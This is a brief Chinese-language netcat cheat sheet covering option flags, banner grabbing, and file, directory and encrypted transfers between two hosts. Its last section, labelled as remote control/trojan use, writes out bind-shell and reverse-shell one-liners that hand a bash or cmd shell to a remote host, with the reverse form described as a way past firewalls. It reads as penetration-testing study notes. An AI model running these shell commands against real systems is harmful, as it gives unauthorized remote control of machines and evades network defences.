nc

网络中的瑞士军刀--体积小，功能强大 侦听模式/传输模式

参数

-u            #UDP 模式

-v            #显示详细信息 [-vv更详细信息] 

-w secs        #连接超时设置

-z            #I/O 模式 [扫描时使用]

-l            #监听入站信息

-p port        #打开本地端口

-n            #以数字形式表示的IP地址

-t            #以TELNET的形式应答入站请求

-e prog        #程序重定向

telnet连接(获取banner信息)

nc -nv IP port #连接远程主机并获取banner

传输文本信息(远程电子取证信息收集)

两台机器

A:    nc -lp 666 > ps.txt
B:    ps aux | nc -nv 192.168.1.11 666 -q 1

传输文件/目录

文件：

A:    nc -lp 333 > xx.php #接收方
B:    nc -nv IP  333 < test.php -q 1

或者

A:    nc -q 1 -l 333 < a.exe #发送方
B:    nc -nv IP 333 > 123.exe

目录：

A:    tar -cvf - mulu/ | nc -lp 333 -q 1 #打包传输
B:    nc -nv IP 333 | tar -xvf -         #接收解包

加密传输文件

A:    nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.exe #接收方
B:    mcrypt --flush -Fbqd -a rijndael-256 -m ecb < 0.exe | nc -nv IP 333 -q 1

远程控制/木马

正向：

A:    nc -lp 333 -c bash #服务端主动开bash
B:    nc IP 333 #控制端

反向：

A:    nc -lp 333 #控制端
B:    nc IP 333 -c bash  #绕过防火墙主动连接外部主机

注：Windows用户把bash改成cmd